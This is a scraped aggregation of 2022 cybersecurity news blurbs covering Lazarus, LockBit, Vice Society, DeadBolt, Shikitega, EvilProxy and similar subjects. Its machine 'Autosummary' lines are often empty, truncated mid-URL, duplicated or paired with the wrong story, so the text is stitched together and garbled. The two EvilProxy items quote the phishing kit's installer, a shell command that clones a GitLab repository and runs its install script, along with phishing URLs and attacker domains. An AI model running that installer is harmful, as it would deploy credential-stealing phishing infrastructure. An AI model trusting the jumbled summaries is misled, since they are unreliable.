"North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan. Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. The campaign was observed between February and July 2022. The attacks […]
The post North Korea-linked Lazarus APT targets energy providers around the world appeared first on Security Affairs.
"Autosummary:
Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. "Autosummary:
"Categories: News InterContinental Hotels Group PLC reports that parts of the company"s technology systems have been subject to unauthorized activity. Ransomware? |
The post InterContinental Hotels" booking systems disrupted by cyberattack appeared first on Malwarebytes Labs.
"Autosummary:
InterContinental Hotels Group The InterContinental Hotels Group, also known as IHG Hotels & Resorts, operates 17 hotel brands around the world, including established brands like InterContinental, Regent, Six Senses, Crowne Plaza, and Holiday Inn.Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). "Categories: Threat Intelligence LockBit remained the dominant ransomware variant in August, as it has all year. At the other end of the scale REvil"s revival in slow motion continued with a single victim listed. |
The post Ransomware review: August 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by country, August 2022 Known ransomware attacks by industry sector, August 2022 The future of ransomware Two events in August hinted at how ransomware gangs" tactics may evolve beyond "double extortion", the biggest innovation in ransomware tactics in recent years. Known ransomware attacks by gang, August 2022 As we wrote in June, part of LockBit"s success comes from avoiding the kind of fatal missteps made by rivals like Conti, REvil, and DarkSide, all of whom attracted a great deal of public attention from US law enforcement. Known ransomware attacks by gang, between March 2022 and August 2022 The USA continues to bear the brunt of ransomware attacks, although its preeminence likely reflects the size of its service economy and the large number of potential vicitms rather than a deliberate targeting. "Categories: Business At Malwarebytes, we understand that small-and-medium sized businesses find it uniquely difficult to quickly respond to vulnerabilities. In this post, learn more about our approach to vulnerability response and how our Vulnerability Assessment and Patch Management solutions can address common SMB pain points. |
The post Vulnerability response for SMBs: The Malwarebytes approach appeared first on Malwarebytes Labs.
"Autosummary:
Intuitive With Malwarebytes Vulnerability Assessment, IT teams can easily identify, classify and prioritize vulnerabilities in drivers, applications, macOS, and Windows server and desktop operating systems (OSes).Watch the demos: Vulnerability Assessment: Patch Management: More resources: What is patch management? Our VPM is built on the cloud-based Nebula security platform, making it easy to manage all your Malwarebytes solutions from a single platform: Malwarebytes Incident Response (IR), Endpoint Protection (EP), and Endpoint Detection and Response (EDR). The Nebula security platform provides an intuitive guided user interface; next-generation threat intelligence; multi-layered security, including industry leading remediation; and easy integration with SIEM, SOAR, and ITSM solutions to simplify detection and response and resolve IT tickets with ease. Intuitive, effective, and inclusive vulnerability response for SMBs A combination of factors is responsible for SMBs not doing timely patching, but can mainly be chalked up to a lack of automation and dedicated IT patching staff. "It pays to do some research before taking a leap into the world of internet-connected toys
The post Toys behaving badly: How parents can protect their family from IoT threats appeared first on WeLiveSecurity
"Autosummary:
This could include features like: Microphones and cameras that receive video and audio from the child Speakers and screens to relay audio and video back to the child Bluetooth to link the toy up to a connected app Internet connectivity to the home Wi-Fi router With this kind of technology, smart toys can go beyond the inanimate playthings most of us grew up with. How to mitigate the privacy and security risks of smart toys With smart toys representing a certain degree of security and privacy risks, consider the following best practice advice to counter the threats: Do your research before buying: Check if there’s been negative publicity or research done on the model’s security and privacy credentials. Attackers could theoretically hijack a smart toy with audio capabilities to hack smart homes, by sending audio commands to a voice-activated system (i.e., “Alexa, open the front door”). "CISA added 12 more security flaws to its Known Exploited Vulnerabilities Catalog including four D-Link vulnerabilities. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 12 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including four vulnerabilities in D-Link routers, two Chrome zero-day issues, and a recently disclosed flaw in the QNAP Photo Station. According to Binding Operational […]
The post CISA adds 12 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"The cybersecurity skills shortage continues to present multiple challenges and have repercussions for organizations. The skills gap can be addressed through training and certifications to increase employees’ education. The talent shortage and a variety of specialized fields within cybersecurity have inspired many to reskill and join the industry. One way to get more knowledge is to take advantage of online learning opportunities. Below you can find a list of free online cybersecurity courses that can … More
The post 7 free online cybersecurity courses you can take right now appeared first on Help Net Security.
"Autosummary:
Security Governance & Compliance University of California, Irvine Instructor: Jacob Horne, Cybersecurity Consultant In this course, students are introduced to the field of cyber security with a focus on the domain of security & risk management. Web Security Fundamentals KU Leuven University Instructor: Philippe De Ryck, Founder, Pragmatic Web Security This course provides an overview of the most common attacks, and illustrates fundamental countermeasures that every web application should implement. "With the rapid acceleration of cloud usage and digitized systems, a host of new security concerns are likely to emerge in the new year. Growing threats around network defense, data protection and multicloud strategies are dominating the security conversation, while cybercriminals have become faster, smarter and more discreet than ever before. It’s crucial that businesses, government agencies, schools and other organizations stay mindful of the latest predictions. 4 cybersecurity trends to watch in 2022 eBook … More
The post eBook: 4 cybersecurity trends to watch in 2022 appeared first on Help Net Security.
"Autosummary:
"SymphonyAI Industrial has launched KPI 360, an AI-driven solution that uses real-time data monitoring and prediction to help manufacturing companies view different operational data sources through a single, intelligence dashboard that sets up in hours. Backed by SymphonyAI’s Eureka industrial AI platform, KPI 360 lets any type of user set up monitoring for strategic KPIs through a visual, no-code builder interface. Leveraging SymphonyAI Industrial’s proprietary domain knowledge engine, KPI 360 comes with pre-built KPIs for … More
The post SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard appeared first on Help Net Security.
"Autosummary:
Flexibility and extensibility are built into KPI 360, so our customers can choose the visualization of their choice, link it to one or more KPIs, configure interactions with the visualizations, and change the visual appearance without writing a single line of code.”, Gallello continued. "Autosummary:
"If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a Tuesday report. "Autosummary:
"Autosummary:
" This group"s attacks were observed between mid-April to mid-June, with frequent changes in its tactics, techniques, and procedures (TTPs), tooling, and lures, while targeting Ukrainian orgs (such as hotel chains) and impersonating the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink. "Global organizations are increasingly at risk of ransomware compromise via their extensive supply chains. During May and June 2022 Sapio Research polled 2,958 IT decision-makers across 26 countries. The research revealed that 79% of global IT leaders believe their partners and customers are making their own organization a more attractive ransomware target. The challenge is particularly acute considering that potentially less well-secured SMBs make up a “significant” portion of the supply chain 52% of these … More
The post Most IT leaders think partners, customers make their business a ransomware target appeared first on Help Net Security.
"Autosummary:
"Autosummary:
When flooding the CS servers, these people are using the username “Stop Putin!” on multiple computers and changing their computer name to various messages, such as “Stop the war!,” “15000+ dead Russian soldiers!,” and “Be a Russian patriot!” "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The findings, which come from Google"s Threat Analysis Group (TAG), builds upon a prior report published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "Autosummary:
"Autosummary:
"While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said. "Autosummary:
The flaw, discovered by researchers at Secure D and reported to HP, is tracked as CVE-2022-38395 and has a "high" severity score of 8.2, as it enables attackers to elevate their privileges on vulnerable systems. "Autosummary:
"Autosummary:
" This group"s attacks were observed between mid-April to mid-June, with frequent changes in its tactics, techniques, and procedures (TTPs), tooling, and lures, while targeting Ukrainian orgs (such as hotel chains) and impersonating the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink. "A new Linux malware dubbed Shikitega leverages a multi-stage infection chain to target endpoints and IoT devices. Researchers from AT&T Alien Labs discovered a new piece of stealthy Linux malware, dubbed Shikitega, that targets endpoints and IoT devices. The malware outstands for its multistage infection chain, threat actors use it to can gain full control of the system […]
The post Experts spotted a new stealthy Linux malware dubbed Shikitega appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Ransomware Tags: FBI Tags: CISA Tags: StopRansomware Tags: Vice Society Tags: HelloKitty Tags: SonicWall Tags: PrintNightmare Tags: LAUSD The FBI, CISA, and the MS-ISAC have released a joint Cybersecurity Advisory after observing Vice Society threat actors disproportionately targeting the education sector with ransomware attacks. |
The post Warning issued about Vice Society ransomware targeting the education sector appeared first on Malwarebytes Labs.
"Autosummary:
Authentication Require all accounts with password logins to meet the required standards for developing and managing password policies: Require multifactor authentication wherever you can—particularly for webmail, VPNs, and critical systems Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege Implement time-based access for accounts set at the admin level and higher Use long passwords (CISA says 8 characters, we say you can do better than that) and password managers Store passwords using industry best practice password hashing functions Implement password rate limits and lockouts Avoid frequent password resets (once a year is fine) Avoid reusing passwords Disable password “hints” Require administrator credentials to install software Software Use anti-malware software, and keep all operating systems, software, and firmware up to date. Backups Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). "Categories: News Tags: interpol Tags: sextortion Tags: mobile malware Tags: extortion In an international police action supported by Interpol, law enforcement agencies have uncovered and dismantled an international sextortion ring. |
The post Sextortionists used mobile malware to steal nude videos, contact lists from victims appeared first on Malwarebytes Labs.
"Autosummary:
"Booz Allen Hamilton and CyberSaint have formed a strategic partnership that aligns Booz Allen’s cybersecurity consulting services with CyberSaint’s cyber and IT risk management software, providing clients with an on-demand view of their cybersecurity posture against frameworks and standards like the NIST CSF paired with credible cyber risk quantification and analytics. Considering the fast-changing landscape of cybersecurity threats, organizations need a way to understand their cyber risks, whether that is ransomware from a criminal group … More
The post Booz Allen Hamilton and CyberSaint provide clients with real-time insight into their cybersecurity posture appeared first on Help Net Security.
"Autosummary:
The Booz Allen Hamilton Cyber Risk Solution, powered by CyberSaint, is designed for strategic (BoD, ELT, ERM) and operational (CISO, Risk Director) stakeholders to measure, monitor, and manage their cybersecurity risks and control posture. "CyberCube has partnered with AkinovA, to enable AkinovA’s clients to benefit from CyberCube’s modeling and analytics. The partnership will see CyberCube’s products made available to AkinovA’s platform. In doing so, the entire value chain of the risk transfer sector can gain access to CyberCube’s models. CyberCube’s models are based on cyber risk scenarios including ransomware attacks, cloud outages and major systemic risks to support the insurance, reinsurance and Insurance-Linked Securities (ILS) organisations to make better … More
The post AkinovA’s clients can now benefit from CyberCube’s modeling and analytics appeared first on Help Net Security.
"Autosummary:
Henri Winand, AkinovA CEO, commented: “In 2020, AkinovA pioneered first-of-a-kind Cloud outage and cyber-induced electricity power generation downtime risk transfers together with AkinovA ecosystem partners, including a leading broker and underwriting capital. "Categories: News Categories: Threats Researchers from the AT&T Alien Labs Resarch have discovered a stealthy new Linux malware. |
The post Evasive Shikitega Linux malware drops Monero cryptominer appeared first on Malwarebytes Labs.
"Autosummary:
Protect your Linux system from Shikitega Linux users can protect their systems from Shikitega with standard Linux hardening precautions, prompt patching to close vulnerabilities like CVE-2021-4034 and CVE-2021-3493, and with effective anti-malware and EDR on servers and endpoints. "Just as developers and security teams were getting ready to take a breather and fire up the BBQ for the holiday weekend, the U.S.’s most prestigious security agencies (NSA, CISA, and ODNI) dropped a 60+ page recommended practice guide, Securing the Software Supply Chain for Developers. My first reaction was that it’s great to see these agencies adding to the public discourse in these still heady days where we’re all sorting out software supply chain … More
The post Government guide for supply chain security: The good, the bad and the ugly appeared first on Help Net Security.
"Autosummary:
The upshot of these frameworks is they give developers clear guidance on (1) how to develop secure code, from design issues to organizational structure issues for more secure software; (2) build system integrity (making sure malicious code isn’t being injected in our build systems); and (3) what happens after software is built and how to operate systems security (vulnerability remediation, monitoring, those types of aspects). "Following the recent Twilio hack leading to the leakage of 2FA (OTP) codes, cybercriminals continue to upgrade their attack arsenal to orchestrate advanced phishing campaigns targeting users worldwide. Resecurity has recently identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark Web. On some sources the alternative name is Moloch, which has some connection to a phishing-kit developed by several notable underground actors who targeted the financial institutions and e-commerce sector before. While the … More
The post EvilProxy phishing-as-a-service with MFA bypass emerged on the dark web appeared first on Help Net Security.
"Autosummary:
zM2MDMtZWNhZC00ZWFmLWE5YjMtYzgzZTFjM2E1ZDdl&ui_locales=en-US&mkt =en-US&state=jHi-CP0Nu4oFHIxklcT1adstnCWbwJwuXQWTxNSSsw-23qiXK- 6EzyYoAyNZ6rHuHwsIYSkRp99F-bqPqhN4JVCnT4-3MQIDvdTKapKarcqaMFi6_ xv2__3D0KfqBQ070ykGBGlwxFQ6Mzt9CwUsz2zdgcB4jFux2BhZQwcj-WumSBz 0VQs5VePV-wz00E8rDxEXfQdlv-AT29EwdG77AmGWinyf3yQXSZTHJyo8s-IWS Holy3Kbturwnc87sDC3uwEn6VDIjKbbaJ-c-WOzrg&x-client-SKU=ID_ NETSTANDARD2_0&x-client-ver=6.16.0.0 Post-authorization URL https://473126b6-bf9a-4a96-8111-fb04f6631ad8-571c4b21.The automated installer has a reference to a user “Olf Dobs” (ksh8h297aydO) on Gitlab: apt update -qqy && apt dist-upgrade --no-install-recommends --no-install-suggests -o Dpkg::options::="--force-confdef" -y \ && apt install --no-install-recommends --no-install-suggests -y git \ && rm -rf /srv/control-agent && git clone --recurse-submodules https://gitlab.com/ksh8h297ayd0/docker-control-agent.git /srv/control-agent \ && cd /srv/control-agent && chmod +x ./install.sh \ && /srv/control-agent/install.sh "[license_key]" ===*= After a successful deployment, the scripts will forward the traffic from the victims via 2 gateways defined as “upstream”: Based on further analysis, we identified some of the domain names used for phishing campaigns. 147[.]78[.]47[.]250 185[.]158[.]251[.]169 194[.]76[.]226[.]166 msdnmail[.]net evilproxy[.]pro top-cyber[.]club rproxy[.]io login-live.rproxy[.]io gw1.usd0182738s80[.]click:9000 gw2.usd0182738s80[.]click:9000 cpanel.evilproxy[.]pro cpanel.pua75npooc4ekrkkppdglaleftn 5mi2hxsunz5uuup6uxqmen4deepyd[.]onion "Ant Group has unveiled three initiatives to make trusted AI more accessible. This includes making its graph processing database TuGraph open source; launching an AI security testing platform; and a privacy-preserving computation open platform. Announced at the World Artificial Intelligence Conference (“WAIC”) in Shanghai, these actions aim to make trusted AI solutions more accessible to enable industrial multi-party collaborations in the digital economy. A growing number of industries have been adopting AI technology at a … More
The post Ant Group supports industrial collaborations in the digital economy with more accessible AI appeared first on Help Net Security.
"Autosummary:
“We believe that Privacy-Preserving Computation, Blockchain, Graph-Processing Technology, Distributed Database and Green Computing are the fundamental technologies for a large-scale industrial application of AI in the digital economy. "Autosummary:
"After the District contacted officials over the holiday weekend, the White House brought together the Department of Education, the Federal Bureau of Investigation (FBI) and the Department of Homeland Security"s Cybersecurity and Infrastructure Security Agency (CISA) to provide rapid, incident response support to Los Angeles Unified, building on the immediate support by local law enforcement agencies," the district said. "A few days ago – and smack in the middle of the weekend preceding Labor Day (as celebrated in the U.S.) – Taiwan-based QNAP Systems has warned about the latest round of DeadBolt ransomware attacks targeting users of its QNAP network-attached storage (NAS) devices. “QNAP detected a new DeadBolt ransomware campaign on the morning of September 3rd, 2022 (GMT+8). The campaign appears to target QNAP NAS devices running Photo Station with internet exposure,” the company … More
The post DeadBolt is hitting QNAP NAS devices via zero-day bug, what to do? appeared first on Help Net Security.
"Autosummary:
“QNAP Product Security Incident Response Team (QNAP PSIRT) had made the assessment and released the patched Photo Station app for the current version within 12 hours,” the company said, and urged users to: Update Photo Station to the latest available version or switch to using QuMagie, a similar app for managing photo storage Remove their QNAP NAS from the internet “We recommend users to make use of the myQNAPcloud Link feature provided by QNAP, or enable the VPN service. "Autosummary:
"Autosummary:
"China accuses the United States of conducting tens of thousands of cyberattacks on its country, including cyberespionage campaigns. The Government of Beijing accused the United States of launching tens of thousands of cyberattacks on China. The attacks aimed at stealing sensitive data from government entities and universities. In the past, the US Government has accused […]
The post China accuses the US of cyberattacks appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Downloaded shellcode fetching Mettle (AT&T) Mettle fetches yet a smaller ELF file, which exploits CVE-2021-4034 (aka PwnKit) and CVE-2021-3493 to elevate privileges and download the final stage payload, a cryptocurrency miner, as root. "Autosummary:
"One of the UK’s largest public transport operators, Go-Ahead Group, has fallen victim to a cyberattack. The Go-Ahead Group, which connects people across its bus and rail networks, reported it was “managing a cyber security incident” after “unauthorized activity” was detected on its network. This type of cyber strike on the UK’s transport system isn’t uncommon. Hackers have regularly been targeting the airline industry for some time. By design, the cyberattacks intend to cause interruptions … More
The post Go-Ahead cyberattack might derail UK public transport services appeared first on Help Net Security.
"Autosummary:
Stretched beyond capacity Nearly seven in ten (69%) mid-sized organizations have three people or fewer in their team looking after cyber security, according to Censornet’s ‘UK Mid-Market on Code Red Report’. "Autosummary:
Yet, Minecraft dominates this category, too, with a 40% share, followed by GTA (15%), PUBG (10%), Roblox (10%), and FIFA (5%). "Autosummary:
"The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file," the federal law enforcement agency said. "Autosummary:
Impacted models table (Zyxel) Alternatively, you can visit Zyxel’s official download portal, enter your device model, and download the latest firmware update listed in the results. "Autosummary:
Its brands include luxury, premium, and essential hotel chains such as InterContinental, Regent, Six Senses, Crowne Plaza, Holiday Inn, and many others. "Actions to take today to mitigate cyber threats from ransomware:
• Prioritize and remediate known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce multifactor authentication.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.
Over the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, have been a frequent target of ransomware attacks.
"
Autosummary: One of the US largest School districts, the Los Angeles Unified School District, suffered a ransomware attack during the weekend. The Los Angeles Unified School District is one of the largest school distinct in the US, it was hit by a ransomware attack during the Labor Day weekend. The security breach took place a few […] The post The Los Angeles Unified School District hit by a ransomware attack appeared first on Security Affairs.
Autosummary:
The Los Angeles Unified School District hit by a ransomware attack
exploits
ransomware
2022-09-06
https://securityaffairs.co/wordpress/135411/cyber-crime/los-angeles-unified-school-district-ransomware.html
Experts spotted new Android spyware that was used by China-linked threat actors to spy on the Uyghur community in China. Researchers from Cyble Research & Intelligence Labs (CRIL) started their investigation after MalwareHunterTeam experts shared information about a new Android malware used to spy on the Uyghur community. The malware disguised as a book titled “The China […]
The post A new Android malware used to spy on the Uyghur Community appeared first on Security Affairs.
"Autosummary:
“Upon performing behavioral analysis, we observed that this malware has an icon similar to the cover page of the book known as The China Freedom Trap written by Dolkun Isa, and on opening the app, the user is shown a few pages of the book including the cover page, an introduction to the book and its author, along with a condolence letter at the end.” "Categories: Exploits and vulnerabilities Categories: News Tags: QNAP Tags: Photo Station Tags: Deadbolt Tags: ransomware Tags: VPN QNAP says it"s detected that DeadBolt is exploiting a Photo Station vulnerability to encrypt QNAP NAS systems directly connected to the internet. |
The post Update now! QNAP warns users DeadBolt is exploiting Photo Station vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later How to fix the QNAP Photo Station vulnerability Update Photo Station to the latest available version or to switch to QuMagie. "Autosummary:
"As speed of business increases, more and more organizations are looking to either buy companies or outsource more services to gain market advantage. With organizations expanding their vendor base, there is a critical need for holistic third-party risk management (TPRM) and comprehensive cybersecurity measures to assess how much risk vendors pose. While organizations assess and manage risk on a multitude of layers, none present bigger threats to business resiliency than third-party risk and a lack … More
The post Your vendors are likely your biggest cybersecurity risk appeared first on Help Net Security.
"Autosummary:
Addressing cybersecurity with your third parties A cross-functional approach to TPRM and cybersecurity reduces duplicative work and lends deeper insight into enterprise risk for your organization, your vendors, and your partners. Organizations that understand and implement integrated cybersecurity and TPRM systems gain a complete view of their vendor’s risk profile, comprehensively prepare for possible threats and compliance violations, and improve business results with trustworthy secure vendors. "Trend Micro predicted that ransomware groups will increasingly target Linux servers and embedded systems over the coming years. It recorded a double-digit year-on-year (YoY) increase in attacks on these systems in 1H 2022. Jon Clay, VP of threat intelligence for Trend Micro, said: “New and emerging threat groups continue to evolve their business model, focusing their attacks with even greater precision. That’s why it’s essential that organizations get better at mapping, understanding, and protecting their … More
The post Ransomware attacks on Linux to surge appeared first on Help Net Security.
"Autosummary:
According to the data: 63 billion threats blocked by Trend Micro in 1H 2022 52% more threats in the first half of the year than the same period in 2021 Government, manufacturing and healthcare are the top three sectors targeted with malware Detection of attacks from ransomware-as-a-service surged in the first half of 2022. "SecureAuth has released Arculix, an access management and continuous authentication platform. Driven by SecureAuth’s patented risk-based behavioral modeling engine, Arculix provides end users with a frictionless and passwordless digital journey. The platform takes into account an identity’s level of assurance based on user, device and browser trust that employs artificial intelligence and machine learning (AI/ML) to determine anomalous behavior. Arculix enables organizations to accelerate their Zero Trust initiatives by ensuring the right digital identities have … More
The post SecureAuth Arculix offers passwordless desktop SSO and continuous authentication appeared first on Help Net Security.
"Autosummary:
“Identity security remains a top concern and investment area for most enterprise and government organizations especially given that universal adoption of passwordless log-in technology is encouraged by leaders such as Apple, Google, Meta, Microsoft, Twitter, and more,” said Jay Bretzmann, Research Vice President for Security Products, IDC. "66% of organizations have changed their cybersecurity strategy as a direct response to the conflict between Russia and Ukraine, while 64% suspect their organization has been either directly targeted or impacted by a nation-state cyber attack, according to Venafi. This Help Net Security video uncovers how exploiting machine identities is becoming the modus operandi for nation-state attackers.
The post Use of machine identities is growing in state-sponsored cyberattacks appeared first on Help Net Security.
"Autosummary:
"Acronis researchers have concluded that ransomware continues to be the number one threat to large and medium-sized businesses, including government organizations. This Help Net Security video highlights why organizations and businesses need a more holistic approach to cybersecurity.
The post Ransomware remains the number one threat to businesses and government organizations appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Microsoft released a Windows Defender update to fix a problem that caused Defender antivirus to identify Chromium, Electron, as malware Microsoft released a Windows Defender update to fix a problem that caused Defender antivirus software to identify the app based on the Chromium browser engine or the Electron JavaScript framework as malware. Multiple users reported […]
The post Windows Defender identified Chromium, Electron apps as Hive Ransomware appeared first on Security Affairs.
"Autosummary:
"Resecurity researchers discovered a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised on the Dark Web. Original post: hxxps://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web Following the recent Twilio hack leading to the leakage of 2FA (OTP) codes, cybercriminals continue to upgrade their attack arsenal to orchestrate advanced phishing campaigns targeting users worldwide. Resecurity has recently identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark […]
The post EvilProxy Phishing-As-A-Service With MFA Bypass Emerged In Dark Web appeared first on Security Affairs.
"Autosummary:
The automated installer has a reference to a user “Olf Dobs” (ksh8h297aydO) on Gitlab: apt update -qqy && apt dist-upgrade –no-install-recommends –no-install-suggests -o Dpkg::options::=”–force-confdef” -y \ && apt install –no-install-recommends –no-install-suggests -y git \ && rm -rf /srv/control-agent && git clone –recurse-submodules https://gitlab.com/ksh8h297ayd0/docker-control-agent.git /srv/control-agent \ && cd /srv/control-agent && chmod +x ./install.sh \ && /srv/control-agent/install.sh ‘[license_key]’ ===*= After a successful deployment, the scripts will forward the traffic from the victims via 2 gateways defined as “upstream”: Based on further analysis, we identified some of the domain names used for phishing campaigns.All&response_mode=form_post&nonce=637975588496970710 .Zjg3YzFkMmEtYTUxYy00NDliLWEzYzAtMTExZTliNjBkY2ZkY2U3NzM2MDMtZWNhZC00ZWFmLWE5YjMtYzgzZTFjM2E1ZDdl&ui_locales=en-US&mkt=en-US&state=jHi-CP0Nu4oFHIxklcT1adstnCWbwJwuXQWTxNSSsw-23qiXK-6EzyYoAyNZ6rHuHwsIYSkRp99F-bqPqhN4JVCnT4-3MQIDvdTKapKarcqaMFi6_xv2__3D0KfqBQ070ykGBGlwxFQ6Mzt9CwUsz2zdgcB4jFux2BhZQwcj-WumSBz0VQs5VePV-wz00E8rDxEXfQdlv-AT29EwdG77AmGWinyf3yQXSZTHJyo8s-IWSHoly3Kbturwnc87sDC3uwEn6VDIjKbbaJ-c-WOzrg&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.16.0.0 Post-Authorization URL https://473126b6-bf9a-4a96-8111-fb04f6631ad8-571c4b21.msdnmail[.]net/mail/?realm=[victim_domain]&exsvurl=1&ll-cc=1033&modurl=0&JitExp=1&url=%2Fowa%2F%3Frealm%253d%2526exsvurl%253d1%2526ll-cc%253d1033%2526modurl%253d0%2526login_hint%253[victim_email]%252540[victim_domain] The bad actors are using multiple techniques and approaches to recognize victims and to protect the phishing-kit code from being detected. "Autosummary:
QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later Alternatively, QNAP suggests users replace Photo Station with QuMagie, a safer photo storage management tool for QNAP NAS devices. "Autosummary:
" In the incident analyzed by Trend Micro, a compromised endpoint belonging to an unnamed entity was used as a conduit to connect to the domain controller via remote desktop protocol (RDP) and transfer to it a Windows installer posing as AVG Internet Security, which dropped and executed, among other files, the vulnerable driver. "Autosummary:
A reverse-proxy Phishing-as-a-Service (PaaS) platform called EvilProxy has emerged, promising to steal authentication tokens to bypass multi-factor authentication (MFA) on Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and even PyPI. "Autosummary:
QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later Alternatively, QNAP suggests users replace Photo Station with QuMagie, a safer photo storage management tool for QNAP NAS devices. "Threat actors published a sample of data allegedly stolen from TikTok, but the company denies it was breached. The hacking collective AgainstTheWest recently published a post on Breach Forums message board claiming to have hacked TikTok and stolen source code and user data. The group published screenshots of an alleged stolen data, it claims to […]
The post TikTok denies data breach following leak of user data appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Exploits and vulnerabilities Categories: News The Google Chrome Team recently issued a fix for the CVE-2022-3075 zero-day. |
The post Zero-day puts a dent in Chrome"s mojo appeared first on Malwarebytes Labs.
"Autosummary:
"QNAP warns customers of ongoing DeadBolt ransomware attacks that are exploiting a zero-day vulnerability in Photo Station. QNAP warns customers of an ongoing wave of DeadBolt ransomware attacks, threat actors are exploiting a zero-day vulnerability in Photo Station. The attacks started on Saturday meantime the Taiwanese vendor has addressed the vulnerability. “QNAP Systems, Inc. today […]
The post QNAP warns new Deadbolt ransomware attacks exploiting zero-day appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" "AgainstTheWest has had a long history of lying about breaches or other things (saying he"s a state-sponsored hacking group... LOL) and this was just the tipping point," pompompurin, the actor who launched Breach Forums earlier this March, said. "The author of the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub. The development team behind the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub after the SafeBreach Labs researchers recently analyzed a new targeted attack aimed at Farsi-speaking code developers. […]
The post Alleged Iranian threat actors leak the code of their CodeRAT malware appeared first on Security Affairs.
"Autosummary:
CodeRAT allows its operators to monitor the victim’s activity on social networks and on local machines by supporting 50 commands, including taking screenshots, copying clipboard, terminating processes, analyzing GPU usage, downloading/uploading/deleting files, monitoring running processes, and executing programs "Autosummary:
Cookie-loving shark The overlay, SMS intercept, remote control, and keylogging systems are still present on SharkBot 2.25, but a cookie logger has been added on top of them. "Cybersecurity firm Armorblox discovered a new phishing campaign aimed at American Express customers. Armorblox researchers uncovered a new phishing campaign that is targeting American Express customers. The messages use a malicious attachment and their content attempt to trick cardholders into opening it. The subject of the emails reads “Important Notification About Your Account” in an attempt to urge recipients […]
The post A new phishing scam targets American Express cardholders appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Google rolled out emergency fixes to address a vulnerability in the Chrome web browser that is being actively exploited in the wild. Google on Friday released emergency fixes to address a vulnerability, tracked as CVE-2022-3075, in the Chrome web browser that is being actively exploited in the wild. The CVE-2022-3075 flaw is caused by insufficient data […]
The post Google rolled out emergency fixes to address actively exploited Chrome zero-day appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"A global research study from Lenovo reveals how the CIO role has evolved, shedding light on growing areas of responsibility and increasing influence in the C-Suite, as well as removing barriers to business growth. Today, technology is the nervous system that connects corporate strategy, finance, innovation, operations, and talent. CIOs are increasingly tasked with connecting with key stakeholders across the organization to ensure alignment and drive execution. With IT enmeshed in every facet of a … More
The post CIOs find it most difficult to solve cybersecurity challenges appeared first on Help Net Security.
"Autosummary:
